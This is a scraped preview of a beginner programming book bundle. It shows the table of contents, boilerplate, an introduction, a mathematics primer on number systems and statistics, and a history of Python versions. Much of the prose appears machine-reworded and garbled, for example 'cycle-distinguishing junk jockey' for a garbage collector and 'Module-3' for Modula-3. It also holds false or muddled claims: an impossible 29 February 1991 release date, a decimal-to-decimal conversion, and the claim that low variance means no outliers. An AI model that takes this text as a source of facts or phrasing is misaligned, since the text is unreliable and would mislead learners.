Coding Languages: SQL, Linux, Python, machine learning. The Step-by-Step Guide for Beginners

741 195 8MB

English Pages [472]

Report DMCA / Copyright

DOWNLOAD FILE

Polecaj historie

Coding Languages: SQL, Linux, Python, machine learning. The Step-by-Step Guide for Beginners

Table of contents :
Introduction
Chapter 1 Mathematical Concepts
Chapter 2 What Is Python
Chapter 3 Writing The First Python Program
Chapter 4 The Python Operators
Chapter 5 Basic Data Types In Python
Chapter 6 Data Analysis with Python
Chapter 7 Conditional Statements
Chapter 8 Loops – The Never-Ending Cycle
Chapter 9 File handling
Chapter 10 Exception Handling
Chapter 11 Tips and Tricks For Success
Conclusion
Introduction
Chapter 1 What is Machine Learning
Chapter 2 Applications of Machine Learning
Chapter 3 Big Data and Machine Learning
Chapter 4 Types Of Machine Learning
Chapter 5 How Does Machine Learning Compare to AI
Chapter 6 Hands on with Python
Chapter 7 What Is Python, and How Do I Use It?
Chapter 8 Machine Learning Algorithms
Chapter 9 Essential Libraries for Machine Learning in Python
Chapter 10 Artificial Neural Networks
Chapter 11 Data Science
Chapter 12 A Quick Look At Deep Learning
Conclusion
Introduction
Chapter 1 Basic Operating System Concepts, Purpose and Function
Chapter 2 Basics of Linux
Chapter 3 What are Linux Distributions?
Chapter 4 Setting up a Linux System
Chapter 5 Comparison between Linux and other Operating Systems
Chapter 6 Linux Command Lines
Chapter 7 Introduction to Linux Shell
Chapter 8 Basic Linux Shell Commands
Chapter 9 Variables
Chapter 10 User and Group Management
Chapter 11 Learning Linux Security Techniques
Chapter 12 Some Basic Hacking with Linux
Chapter 13 Types of Hackers
Conclusion
Introduction
Chapter 1 Relational Database Concepts
Chapter 2 SQL Basics
Chapter 3 Some of the Basic Commands We Need to Know
Chapter 4 Installing and configuring MySql on your system
Chapter 5 Data Types
Chapter 6 SQL Constraints
Chapter 7 Databases
Chapter 8 Tables
Chapter 9 Defining Your Condition
Chapter 10 Views
Chapter 11 Triggers
Chapter 12 Combining and Joining Tables
Chapter 13 Stored Procedures and Functions
Chapter 14 Relationships
Chapter 15 Database Normalization
Chapter 16 Database Security and Administration
Chapter 17 Real-World Uses
Conclusion

Citation preview

CODING LANGUAGES

SQL, LINUX, PYTHON, MACHINE LEARNING. THE STEP-BY-STEP GUIDE FOR BEGINNERS TO LEARN COMPUTER PROGRAMMING IN A CRASH COURSE + EXERCISES

JOHN S. CODE

© Copyright 2019 - All rights reserved. The content contained within this book may not be reproduced, duplicated or transmitted without direct written permission from the author or the publisher. Under no circumstances will any blame or legal responsibility be held against the publisher, or author, for any damages, reparation, or monetary loss due to the information contained within this book. Either directly or indirectly. Legal Notice: This book is copyright protected. This book is only for personal use. You cannot amend, distribute, sell, use, quote or paraphrase any part, or the content within this book, without the consent of the author or publisher. Disclaimer Notice: Please note the information contained within this document is for educational and entertainment purposes only. All effort has been executed to present accurate, up to date, and reliable, complete information. No warranties of any kind are declared or implied. Readers acknowledge that the author is not engaging in the rendering of legal, financial, medical or professional advice. The content within this book has been derived from various sources. Please consult a licensed professional before attempting any techniques outlined in this book. By reading this document, the reader agrees that under no circumstances is the author responsible for any losses, direct or indirect, which are incurred as a result of the use of information contained within this document, including, but not limited to, — errors, omissions, or inaccuracies.

INTRODUTION First of all I want to congratulate you for having purchased the bundle on programming languages. This book is aimed at those who approach programming and coding languages for the first time and will take you to know the basics, approach the practice, read important tips and advice on the most popular programming languages. In these texts you will have the opportunity to know one of the most innovative operating systems such as Linux, manage and ordinary data with the well-known SQL language, learn to write in coding and master it with Python and analyze big data with the Machine Learning book by fully entering the world of computer programming. You no longer need to feel left out at work to have no idea of working with computer data, having a clearer vision and starting to get serious about your future. The world is moving forward with technologies and mastering programming languages becomes more and more fundamental in work and for your future in general. I wish you a good read and good luck for this new adventure and for your future.

TABLE OF CONTENTS

1. PYTHON PROGRAMMING FOR BEGINNERS: A hands-on easy guide for beginners to learn Python programming fast, coding language, Data analysis with tools and tricks. John S. Code

2. PYTHON MACHINE LEARNING: THE ABSOLUTE BEGINNER’S GUIDE FOR UNDERSTAND NEURAL NETWORK, ARTIFICIAL INTELLIGENT, DEEP LEARNING AND MASTERING THE FUNDAMENTALS OF ML WITH PYTHON. John S. Code

3. LINUX FOR BEGINNERS: THE PRACTICAL GUIDE TO LEARN LINUX OPERATING SYSTEM WITH THE PROGRAMMING TOOLS FOR THE INSTALLATION, CONFIGURATION AND COMMAND LINE + TIPS ABOUT HACKING AND SECURITY. John S. Code

4. SQL COMPUTER PROGRAMMING FOR BEGINNERS:

LEARN THE BASICS OF SQL PROGRAMMING WITH THIS STEP-BYSTEP GUIDE IN A MOST EASILY AND COMPREHENSIVE WAY FOR BEGINNERS INCLUDING PRACTICAL EXERCISE. John S. Code

PYTHON PROGRAMMING FOR BEGINNERS: A HANDS-ON EASY GUIDE FOR BEGINNERS TO LEARN PYTHON PROGRAMMING FAST, CODING LANGUAGE, DATA ANALYSIS WITH TOOLS AND TRICKS.

JOHN S. CODE © Copyright 2019 - All rights reserved. The content contained within this book may not be reproduced, duplicated or transmitted without direct written permission from the author or the publisher. Under no circumstances will any blame or legal responsibility be held against the publisher, or author, for any damages, reparation, or monetary loss due to the information contained within this book. Either directly or indirectly.

Legal Notice: This book is copyright protected. This book is only for personal use. You cannot amend, distribute, sell, use, quote or paraphrase any part, or the content within this book, without the consent of the author or publisher. Disclaimer Notice: Please note the information contained within this document is for educational and entertainment purposes only. All effort has been executed to present accurate, up to date, and reliable, complete information. No warranties of any kind are declared or implied. Readers acknowledge that the author is not engaging in the rendering of legal, financial, medical or professional advice. The content within this book has been derived from various sources. Please consult a licensed professional before attempting any techniques outlined in this book. By reading this document, the reader agrees that under no circumstances is the author responsible for any losses, direct or indirect, which are incurred as a result of the use of information contained within this document, including, but not limited to, — errors, omissions, or inaccuracies.

Table of Contents Introduction Chapter 1 Mathematical Concepts Chapter 2 What Is Python Chapter 3 Writing The First Python Program

Chapter 4 The Python Operators Chapter 5 Basic Data Types In Python Chapter 6 Data Analysis with Python Chapter 7 Conditional Statements Chapter 8 Loops – The Never-Ending Cycle Chapter 9 File handling Chapter 10 Exception Handling Chapter 11 Tips and Tricks For Success Conclusion

Introduction Python is an awesome decision on machine learning for a few reasons. Most importantly, it's a basic dialect at first glance. Regardless of whether you're not acquainted with Python, getting up to speed is snappy in the event that you at any point have utilized some other dialect with C-like grammar. Second, Python has an incredible network which results in great documentation and inviting and extensive answers in Stack Overflow (central!). Third, coming from the colossal network, there are a lot of valuable libraries for Python (both as "batteries included" an outsider), which take care of essentially any issue that you can have (counting machine learning). History of Python Python was invented in the later years of the 1980s. Guido van Rossum, the founder, started using the language in December 1989. He is Python's only known creator and his integral role in the growth and development of the language has earned him the nickname "Benevolent Dictator for Life". It was created to be the successor to the language known as ABC. The next version that was released was Python 2.0, in October of the year 2000 and had significant upgrades and new highlights, including a cycle- distinguishing junk jockey and back up support for Unicode. It was most fortunate, that this particular version, made vast improvement procedures to the language turned out to be more straightforward and network sponsored. Python 3.0, which initially started its existence as Py3K. This version was rolled out in December of 2008 after a rigorous testing period. This particular version of Python was hard to roll back to previous compatible versions which are the most

unfortunate. Yet, a significant number of its real highlights have been rolled back to versions 2.6 or 2.7 (Python), and rollouts of Python 3 which utilizes the two to three utilities, that helps to automate the interpretation of the Python script. Python 2.7's expiry date was originally supposed to be back in 2015, but for unidentifiable reasons, it was put off until the year 2020. It was known that there was a major concern about data being unable to roll back but roll FORWARD into the new version, Python 3. In 2017, Google declared that there would be work done on Python 2.7 to enhance execution under simultaneously running tasks. Basic features of Python Python is an unmistakable and extremely robust programming language that is object-oriented based almost identical to Ruby, Perl, and Java, A portion of Python's remarkable highlights: Python uses a rich structure, influencing, and composing projects that can be analyzed simpler. It accompanies a huge standard library that backs tons of simple programming commands, for example, extremely seamless web server connections, processing and handling files, and the ability to search through text with commonly used expressions and commands. Python's easy to use interactive interface makes it simple to test shorter pieces of coding. It also comes with IDLE which is a "development environment". The Python programming language is one of many different types of coding languages out there for you. Some are going to be suited the best to help out with websites. There are those that help with

gaming or with specific projects that you want to handle. But when it comes to finding a great general-purpose language, one that is able to handle a lot of different tasks all at once, then the Python coding language is the one for you. There are a lot of different benefits to working with the Python language. You will find that Python is easy enough for a beginner to learn how to work with. It has a lot of power behind it, and there is a community of programmers and developers who are going to work with this language to help you find the answers that you are looking for. These are just some of the benefits that we get to enjoy with the Python language, and part of the reason why we will want to get started with this language as soon as possible! The Python programming language is a great general-purpose language that is able to take care of all your computing and programming needs. It is also freely available and can make solving some of the bigger computer programs that you have as easy as writing out some of the thoughts that you have about that solution. You are able to write out the code once, and then, it is able to run on almost any kind of program that you would like without you needing to change up the program at all. How is Python used? Python is one of the best programming languages that is a generalpurpose and is able to be used on any of the modern operating systems that you may have on your system. You will find that Python has the capabilities of processing images, numbers, text, scientific data, and a lot of other things that you would like to save and use on your computer. Python may seem like a simple coding language to work with, but it has a lot of the power and more that you are looking for when it is time to start with programming. In fact, many major businesses,

including YouTube, Google, and more, already use this coding language to help them get started on more complex tasks. Python is also known as a type of interpreted language. This means that it is not going to be converted into code that is readable by the computer before the program is run. Instead, this is only going to happen at runtime. Python and other programming languages have changed the meaning of this kind of coding and have ensured that it is an accepted and widely used coding method for many of the projects that you would like to handle. There are a lot of different tasks that the Python language is able to help you complete. Some of the different options that you are able to work with include: 1. Programming any of the CGI that you need on your web applications. 2. Learning how to build up your own RSS reader 3. Working with a variety of files. 4. Creating a calendar with the help of HTML 5. Being able to read from and write in MySQL 6. Being able to read from and write to PostgreSQL The Benefits of Working with Python When it comes to working with the Python language, you will find that there are a lot of benefits with this kind of coding language. It is able to help you to complete almost any kind of coding process that you would like and can still have some of the ease of use that you are looking for. Let’s take a quick look at some of the benefits that come with this kind of coding language below: Beginners can learn it quickly. If you have always

wanted to work with a coding language, but you have been worried about how much work it is going to take, or that it will be too hard for you to handle, then Python is the best option. It is simple to use and has been designed with the beginner in mind. It has a lot of power to enjoy. Even though Python is easy enough for a beginner to learn how to use, that doesn’t mean that you are going to be limited to the power that you are able to get with some of your codings. You will find that the Python language has the power and more that you need to get so many projects done. It can work with other coding languages. When we get to work on data science and machine learning, you will find that this is really important. There are some projects where you will need to combine Python with another language, and it is easier to do than you may think! It is perfect for simple projects all the way up to more complex options like machine learning and data analysis. This will help you to complete any project that you would like. There are a lot of extensions and libraries that come with the Python language, which makes it the best option for you to choose for all your projects. There are a lot of libraries that you are able to add to Python to make sure that it has the capabilities that you need. There is a large community that comes with Python. This community can answer your questions, show you some of the different codes that you can work with,

and more. As a beginner, it is always a great idea to work with some of these community members to ensure that you are learning as much as possible about Python. When it comes to handling many of the codes and more that you would like in your business or on other projects, nothing is going to be better than working with the Python language. In this guidebook, we will spend some time exploring the different aspects of the Python language, and some of the different things that you are able to do with this coding language as well.

Mathematical Concepts As we have stated before, computers are physical manifestations of several mathematical concepts. Mathematics are the scientific language of solving problems. Over the centuries, mathematicians have theoretically solved many complex issues. Mathematics includes concepts like algebra and geometry. Number Systems Mathematics is a game of number manipulation which makes number systems at the center stage of mathematical concepts. There are several different types of number systems. Before we take a look at the number systems, we have to understand the concept of coding. Coding A way to represent values using symbols is called coding. Coding is as old as humans. Before the number systems we use today, there were other systems to represent values and messages. An example of coding from ancient times is the Egyptian hieroglyphs.

Number systems are also examples of coding because values are represented using special symbols.

There are different types of number systems, and we are going to discuss a few relevant ones. Binary System A binary system has only two symbols, 1 and 0 which are referred to as bits. All the numbers are represented by combining these two symbols. Binary systems are ideal for electronic devices because they also have only two states, on or off. In fact, all electronic devices are based on the binary number system. The number system is positional which means the position of symbols determines the final value. Since there are two symbols in this system, the system has a base of 2. The sole purpose of input and output systems is to convert data to and from binary system to a form that makes better sense to the user. The first bit from the left side is called Most Significant Bit (MSB) while the first bit from the right is called the Least Significant Bit (LSB). Here is the binary equivalent code of “this is a message”: 01110100 01101000 01101001 01110011 00100000 01101001 01110011 00100000 01100001 00100000 01101101 01100101 01110011 01110011 01100001 01100111 01100101 Decimal System The decimal system has ten symbols, the numbers 0 through 9. This is also a positional number system where the position of symbols changes the value it represents. All the numbers in this system are created with different combinations of the initial ten symbols. This system has a base 10. This is also called the Hindu-Arabic number system. Decimals make more sense to humans and are used in daily life. There are two reasons for that.

Creating large numbers from the base symbols follows a consistent pattern Performing arithmetic operations in a decimal system is easier compared to other systems Hexadecimal System The hexadecimal number system is the only one that has letters as symbols. It has the 10 symbols of the decimal system plus the six alphabets A, B, C, D, E and F. This is also a positional number system with a base 16. Hexadecimal system is extensively used to code instructions in assembly language. Number System Conversion We can convert the numbers from one system to another. There are various online tools to do that. Python also offers number conversion, but it is better to learn how it is done manually. Binary to Decimal Here’s a binary number 01101001, let’s convert it to a decimal number. ( 01101001 )2 = 0 x 27 + 1 x 26 + 1 x 25 + 0 x 24 + 1 x 23 + 0 x 22 + 0 x 21 + 1 x 20 ( 01101001 )2 = 0 + 64 + 32 + 0 + 8 + 0 + 0 + 1 ( 01101001 )2 = ( 105 )10 Decimal to Binary To convert a decimal number to binary, we have to repeatedly divide the number by two until the quotient becomes one. Recording the remainder generated at each division step gives us

the binary equivalent of the decimal number.

An interesting thing to note here is that ( 01101001 )2 and ( 1101001 )2 represent the same decimal number ( 105 )10. It means that just like decimal number system, leading zeros can be ignored in the binary number system. Binary to Hexadecimal Binary numbers can be converted to hexadecimal equivalents using two methods. 1. Convert the binary number to decimal, then decimal to hexadecimal number 2. Break binary number in groups of four bits and convert each to its hexadecimal equivalent, keeping the groups’ positions in the original binary number intact. Let’s convert ( 1101001 )2 to a hexadecimal number using the second method. The first step is to break the binary number into different groups each of four bits. If the MSB group has less than four bits, make it four by adding leading zeros. Grouping starts

from the LSB. So, ( 1101001 )2 will give us ( 1001 )2 and ( 0110 )2. Now, remembering their position in the original binary number, we are going to convert each group to a hexadecimal equivalent. Here is the table of hexadecimal equivalents of four-bit binary numbers. Binary

Hexadecimal

0000

0

0001

1

0010

2

0011

3

0100

4

0101

5

0110

6

0111

7

1000

8

1001

9

1010

A

1011

B

1100

C

1101

D

1110

E

1111

F

From the table, we can see ( 1001 )2 is ( 9 )16 and ( 0110 )2,the MSB group, is ( 6 )16. Therefore, ( 1101001 )2 = ( 01101001 )2 = ( 69 )16 Hexadecimal to binary We can use the above given table to quickly convert hexadecimal numbers to binary equivalents. Let’s convert ( 4EA9 )16 to binary. ( 4 )16 = ( 0100 )2 ( E )16 = ( 1110 )2 ( A )16 = ( 1010 )2 ( 9 )16 = ( 1001 )2 So, ( 4EA9 )16 = ( 0100111010101001 )2 = ( 100111010101001 )2 Decimal to Hexadecimal You can say hexadecimal is an extended version of decimals. Let’s convert ( 45781 )10 to decimal. But, first, we have to remember this table. Decimal

Hexadecimal

0

0

1

1

2

2

3

3

4

4

5

5

6

6

7

7

8

8

9

9

10

A

11

B

12

C

13

D

14

E

15

F

We are going to divide the decimal number repeatedly by 16 and record the remainders. The final hexadecimal equivalent is formed by replacing remainder decimals with their correct hexadecimal symbols.

Hexadecimal to Decimal Let’s convert ( 4EA9 )16 to its decimal equivalent. ( 4EA9 )16 = 4 x 163 + 14 x 162 + 10 x 161 + 9 x 160 ( 4EA9 )16 = 16384 + 3584 + 160 + 9 ( 4EA9 )16 = ( 20137 )10 There’s another number system, the octal system, where the number of unique symbols include 0, 1, 2, 3, 4, 5, 6, along with 7. These were developed for small scale devices that worked on small values with limited resources. With the rapid advancements in storage and other computer resources, octal system became insufficient and thus was discarded in favor of hexadecimal number system. You might still find an old octal based computer system. Fractions (Floating Points) Decimal number system supports a decimal point ‘.’ to represent portion/slices of a value. For example, if we want to say half of milk bag is empty using numbers, we can write 0.5 or ½ of milk bag is empty. Do other number systems support decimal point? Yes, they do. Let’s see how to convert ( 0.75 )10 or ( ¾ )10 to binary.

¾ x 2 = 6/4 = 1 . ( 2/4 ) 2/4 x 2 = 4/4 = 1 ( 0.75 )10 = ( ¾ )10 = ( .11 )2 Negatives In the decimal system, a dash or hyphen ‘-’ is placed before a number to declare it as a negative. There are different ways to denote negative numbers in the binary system. The easiest is to consider the MSB as a sign bit, which means if MSB is 1, the number is negative and if the MSB is 0, the number is positive. Determining if a hexadecimal number is negative or positive is a bit tricky. The easiest way is to convert the number into binary and perform the checks for negatives in binary system. Linear Algebra Did you hate algebra in school? I have some bad news for you! Linear algebra is heavily involved in programming because it’s one of the best mathematical ways to solve problems. According to Wikipedia, algebra is the study of mathematical symbols and the rules for manipulating these symbols. The field advanced thanks to the works of Muhammad ibn Musa al-Khwarizmi who introduced the reduction and balancing methods and treated algebra as an independent field of mathematics. During that era, the concept of ‘x’ and ‘y’ etc. variable notation wasn’t widespread but during the Islamic Golden Age, Arabs had a fondness of lengthy “layman terms” descriptions of problems and solutions and that is what Khwarizmi explained algebra concepts in his book. The book dealt with many practical real-life problems including the fields of finance, planning, and legal. So, we know what algebra is. But, where does “linear” comes from? For that, we have to understand what a linear system is. It is

a mathematical model where the system attributes (variables) have a linear relation among themselves. The easiest way to explain this is if the plot between system attributes is a straight line, the system is linear. Linear systems are much simpler than the nonlinear systems. The set of algebraic concepts that relate to linear systems is referred to as linear algebra. Linear algebra helps resolve system problems such as missing attribute values. The first step is to create linear equations to establish the relationship between the system variables.

Statistics Another important field of mathematics that is crucial in various computer science applications. Data analysis and machine learning wouldn’t be what they are without the advancements made in statistical concepts during the 20th century. Let’s see some concepts related to statistics. Outlier Outlier detection is very important in statistical analysis. It helps in homogenizing the sample data. After detecting the outliers, what to do with them is crucial because they directly affect the analysis

results. There are many possibilities including: Discarding Outlier Sometimes it’s better to discard outliers because they have been recorded due to some error. This usually happens where the behavior of the system is already known. System Malfunction But, outliers can also indicate a system malfunction. It is always better to investigate the outliers instead of discarding them straightaway. Average Finding the center of a data sample is crucial in statistical analysis because it reveals a lot of system characteristics. There are different types of averages, each signifying something important. Mean Mean is the most common average. All the data values are added and divided by the number of data values added together. For example, you sell shopping bags to a well-renowned grocery store and they want to know how much each shopping bag can carry. You completely fill 5 shopping bags with random grocery items and weigh them. Here are the readings in pounds. 5.5, 6.0, 4.95, 7.1, 5.0 You calculate the mean as (5.5 + 6 + 4.95 + 7.1 + 5) / 5 = 5.71. You can tell the grocery store your grocery bags hold 5.71 lbs on average. Median Median is the center value with respect to the position of data in a sample data when it’s sorted in ascending order. If sample data has odd members, the median is the value with an equal number of

values on both flanks. If sample data has an even number of values, the median is calculated by finding the mean of two values in the middle with equal number of items on both sides. Mode Mode is the most recurring value in a dataset. If there is no recurring value in the sample data, there is no mode. Variance To find how much each data value in a sample data changes with respect to the average of the sample data, we calculate the variance. Here is a general formula to calculate variance. sum of (each data point - mean of sample points )2 / number of data points in the sample. If the variance is low in a sample data, it means there are no outliers in the data. Standard Deviation We take the square root of variance to find standard deviation. This relates the mean of sample data to the whole of sample data. Probability No one can accurately tell what will happen in the future. We can only predict what is going to happen with some degree of certainty. The probability of an event is written mathematically as, Probability = number of possible ways an event can happen / total number of possibilities A few points: 1. Probability can never be negative 2. Probability ranges between one and zero

3. To calculate probability, we assume that the set of events we are working with occur independently without any interference. Finding the probability of an event can change the probability of something happening in a subsequent event. It depends upon how we are interacting with the system to find event probabilities. Distribution There are many types of distributions. In this book, whenever we talk about distribution, we refer to probability distribution unless explicitly stated otherwise. Let’s take an example of flipping coins and see what is the distribution of such events. HHH HHT HTH TTT THH HTT THT TTH This is a very simple event with only a handful of possible outcomes. We can easily determine the probability of different outcomes. But, this is almost impossible in complex systems with thousands or millions of possible outcomes. Distributions work much better in such cases by visually representing the probability curve. It makes more sense than looking at a huge table of fractions or small decimal numbers. We call a probability distribution discrete if we know all the possible outcomes beforehand.

What Is Python Python is going to be a programming language that is known as interpreted, general-purpose, high-level, and multiparadigm. Python is going to allow the programmers who use it some different styles of programming in order to create simple or even some complex programs, get quicker results than before, and write out code almost as if they are speaking in a human language, rather than like they are talking to a computer. This language is so popular that you will find a lot of major companies that are already using it for their systems, including Google App Engine, Google Search, YouTube, iRobot machines and more. And as the knowledge about this language continues to increase, it is likely that we are going to see even more of the applications and sites that we rely on each day working with this language as well. The initial development of Python was started by Guido van Rossum in the late 1980s. Today, it is going to be developed and run by the Python Software Foundation. Because of the features behind this language, programmers of Python can accomplish their tasks with many different styles of programming. Python can be used for a variety of things as well including serial port access, game development, numeric programming, and web development to name a few. There are going to be a few different attributes that we can look at that show us why the development time that we see in Python is going to be faster and more efficient than what we are seeing with some of the other programming languages out there. These will include: 1. Python is an interpreted language. This means that there is no need for us to compile the code before we

try to execute the program because Python will not need this compilation in the background. It is also going to be a more high-level language that will abstract many sophisticated details from the programming code. Much of this abstraction is going to be focused so that the code could be understood even by those who are just getting started with coding. 2. Python codes are often going to be shorter than similar codes in other languages. Although it does offer some fast times for development, keep in mind that the execution time is going to lag a little bit. Compared to some of the other languages, such as fully compiling options like C and C++< Python is going to execute at a slower rate. Of course, with the processing speeds that we see in most computers today, the differences in the speed are not really going to be noticed by the people who are using the system. There are a lot of different things that we are able to do when it comes to the Python language, and we are going to spend some time looking at how we can do some of the different parts as well. From some of the basics that we are able to do with the help of Python all the way to some of the more complex things that we are able to do with data science and machine learning that we can talk about a little later. And all of this can be done with the ease of the Python language. You will find that when we spend some time focusing on this language and some of the basics that we are able to do will help to prepare us for some of the more complicated things that we are able to do with this code as well. A. WHY TO LEARN PYTHON

Learning the ABCs of anything in this world, is a must. Knowing the essentials is winning half the battle before you get started. It’s easier to proceed when you are equipped with the fundamentals of what you are working on. In the same manner that before you embark on the other aspects of python let us level off the basic elements first. You need to learn and understand the basics of python as a foundation in advancing to the more complicated components. This fundamental information will greatly help you as you go on and make the learning experience easier and enjoyable. Familiarize yourself with the Python Official Website https://www.python.org/. Knowing well the website of python would give you the leverage in acquiring more information and scaling up your knowledge about python. Also, you can get the needed links for your work Learn from Python collections. Locate python collections such as records, books, papers, files, documentations and archives and learn from it. You can pick up a number of lessons from these, and expand your knowledge about Python. There are also tutorials, communities and forums at your disposal. Possess the SEO Basics. Acquire some education on Search Engine Optimization so you can interact with experts in the field and improve your python level of knowledge. That being said, here are the basic elements of Python. B. DIFFERENT VERSIONS OF PYTHON With Guido van Rossum at the helm of affairs, Python has witness three versions over the years since its conception in the '80s. These versions represent the growth, development, and evolution of the scripting language over time, and cannot be done without in telling the history of Python.

The Versions of Python Include The Following; •

Python 0.9.0:

The first-ever version of Python released following its implementation and in-house releases at the Centrum Wiskunde and Informatica (CWI) between the years 1989 and 1990, was tagged version 0.9.0. This early version which was released on alt. sources had features such as exception handling, functions, and classes with inheritance, as well as the core data types of list, str, dict, among others in its development. The first release came with a module system obtained from Module-3, which Van Rossum defined as one of the central programming units used in the development of Python. Another similarity the first release bore with Module-3 is found in the exception model which comes with an added else clause. With the public release of this early version came a flurry of users which culminated in the formation of a primary discussion forum for Python in 1994. The group was named comp. lang. python and served as a milestone for the growing popularity of Python users. Following the release of the first version in the 29th of February, 1991, there were seven other updates made to the early version 0.9.0. These updates took varying tags under the 0.9.0 version and were spread out over nearly three years (1991 to 1993). The first version update came in the form of Python 0.9.1, which was released in the same month of February 1991 as its predecessor. The next update came in the autumn period of the release year, under the label Python 0.9.2. By Christmas Eve of the same year (1991) python published its third update to the earliest version under the label Python 0.9.4. By January of the succeeding year, the 2nd precisely, a gift update under the label Python 0.9.5 was released. By the 6th of April, 1992, a sixth update followed named,

Python 0.9.6. It wasn't until the next year, 1993, that a seventh update was released under the tag Python 0.9.8. The eighth and final update to the earliest version came five months after the seventh, on the 29th of July, 1993, and was dubbed python 0.9.9. These updates marked the first generation of python development before it transcended into the next version label. •

Python 1.0

After the last update to Python 0.9.0, a new version, Python 1.0, was released in January of the following year. 1994 marked the addition of key new features to the Python programming language. Functional programming tools such as map, reduce, filter, and lambda were part of the new features of the version 1 release. Van Rossum mentioned that the obtainment of map, lambda, reduce and filter was made possible by a LISP hacker who missed them and submitted patches that worked. Van Rossum's contract with CWI came to an end with the release of the first update version 1.2 on the 10th of April, 1995. In the same year, Van Rossum went on to join CNRI (Corporation for National Research Initiatives) in Reston, Virginia, United States, where he continued to work on Python and published different version updates. Nearly six months following the first version update, version 1.3 was released on the 12th of October, 1995. The third update, version 1.4, came almost a year later in October of 1996. By then, Python had developed numerous added features. Some of the typical new features included an inbuilt support system for complex numbers and keyword arguments which, although inspired by Modula-3, shared a bit of a likeness to the keyword arguments of Common Lisp. Another included feature was a simple form hiding data through name mangling, although it could

be easily bypassed. It was during his days at CNRI that Van Rossum began the CP4E (Computer Programming for Everybody) program which was aimed at making more people get easy access to programming by engaging in simple literacy of programming languages. Python was a pivotal element to van Rossum's campaign, and owing to its concentration on clean forms of syntax; Python was an already suitable programming language. Also, since the goals of ABC and CP4E were quite similar, there was no hassle putting Python to use. The program was pitched to and funded by DARPA, although it did become inactive in 2007 after running for eight years. However, Python still tries to be relatively easy to learn by not being too arcane in its semantics and syntax, although no priority is made of reaching out to non-programmers again. The year 2000 marked another significant step in the development of Python when the python core development team switched to a new platform — BeOpen where a new group, BeOpen PythonLabs team was formed. At the request of CNRI, a new version update 1.6 was released on the 5th of September, succeeding the fourth version update (Python 1.5) on the December of 1997. This update marked the complete cycle of development for the programming language at CNRI because the development team left shortly afterward. This change affected the timelines of release for the new version Python 2.0 and the version 1.6 update; causing them to clash. It was only a question of time before Van Rossum, and his crew of PythonLabs developers switched to Digital Creations, with Python 2.0 as the only version ever released by BeOpen. With the version 1.6 release caught between a switch of platforms, it didn't take long for CNRI to include a license in the version release of Python 1.6. The license contained in the release was quite more prolonged than the previously used CWI license, and it

featured a clause mentioning that the license was under the protection of the laws applicable to the State of Virginia. This intervention sparked a legal feud which led The Free Software Foundation into a debate regarding the "choice-of-law" clause being incongruous with that if the GNU General Public License. At this point, there was a call to negotiations between FSF, CNRI, and BeOoen regarding changing to Python's free software license which would serve to make it compatible with GPL. The negotiation process resulted in the release of another version update under the name of Python 1.6.1. This new version was no different from its predecessor in any way asides a few new bug fixes and the newly added GPL-compatible license. •

Python 2.0:

After the many legal dramas surrounding the release of the secondgeneration Python 1.0 which corroborated into the release of an unplanned update (version 1.6.1), Python was keen to put all behind and forge ahead. So, in October of 2000, Python 2.0 was released. The new release featured new additions such as list comprehensions which were obtained from other functional programming languages Haskell and SETL. The syntax of this latest version was akin to that found in Haskell, but different in that Haskell used punctuation characters while Python stuck to alphabetic keywords. Python 2.0 also featured a garbage collection system which was able to collect close reference cycles. A version update (Python 2.1) quickly followed the release of Python 2.0, as did Python 1.6.1. However, due to the legal issue over licensing, Python renamed the license on the new release to Python Software Foundation License. As such, every new specification, code or documentation added from the release of version update 2.1 was owned and protected by the PSF (Python Software Foundation)

which was a nonprofit organization created in the year 2001. The organization was designed similarly to the Apache Software Foundation. The release of version 2.1 came with changes made to the language specifications, allowing support of nested scopes such as other statically scoped languages. However, this feature was, by default, not in use and unrequired until the release of the next update, version 2.2 on the 21st of December, 2001. Python 2.2 came with a significant innovation of its own in the form of a unification of all Python's types and classes. The unification process merged the types coded in C and the classes coded in Python into a single hierarchy. The unification process caused Python's object model to remain totally and continuously object-oriented. Another significant innovation was the addition of generators as inspired by Icon. Two years after the release of version 2.2, version 2.3 was published in July of 2003. It was nearly another two years before version 2.4 was released on the 30th of November in 2004. Version 2.5 came less than a year after Python 2.4, in September of 2006. This version introduced a "with" statement containing a code block in a context manager; as in obtaining a lock before running the code block and releasing the lock after that or opening and closing a file. The block of code made for behavior similar to RAII (Resource Acquisition Is Initialization) and swapped the typical "try" or "finally" idiom. The release of version 2.6 on the 1st of October, 2008 was strategically scheduled such that it coincided with the release of Python 3.0. Asides the proximity in release date, version 2.6 also had some new features like the "warnings" mode which outlined the use of elements which had been omitted from Python 3.0. Subsequently, in July of 2010, another update to Python 2.0 was released in the version of python 2.7. The new version updates shared features and coincided in release with version 3.1 — the

first version update of python 3. At this time, Python drew an end to the release of Parallel 2.x and 3.x, making python 2.7 the last version update of the 2.x series. Python went public in 2014, November precisely, to announce to its username that the availability of python 2.7 would stretch until 2020. However, users were advised to switch to python 3 in their earliest convenience. •

Python 3.0:

The fourth generation of Python, Python 3.0, otherwise known as Py3K and python 3000, was published on the 3rd of December 2008. This version was designed to fix the fundamental flaws in the design system of the scripting language. A new version number had to be made to implement the required changes which could not be run while keeping the stock compatibility of the 2.x series that was by this time redundant. The guiding rule for the creation of python 3 was to limit the duplication of features by taking out old formats of processing stuff. Otherwise, Python three still followed the philosophy with which the previous versions were made. Albeit, as Python had evolved to accumulate new but redundant ways of programming alike tasks, python 3.0 was emphatically targeted at quelling duplicative modules and constructs in keeping with the philosophy of making one "and preferably only one" apparent way of doing things. Regardless of these changes, though, version 3.0 maintained a multi-paradigm language, even though it didn't share compatibility with its predecessor. The lack of compatibility meant Python 2.0 codes were unable to be run on python 3.0 without proper modifications. The dynamic typing used in Python as well as the intention to change the semantics of specific methods of dictionaries, for instance, made a perfect mechanical conversion from the 2.x series to version 3.0

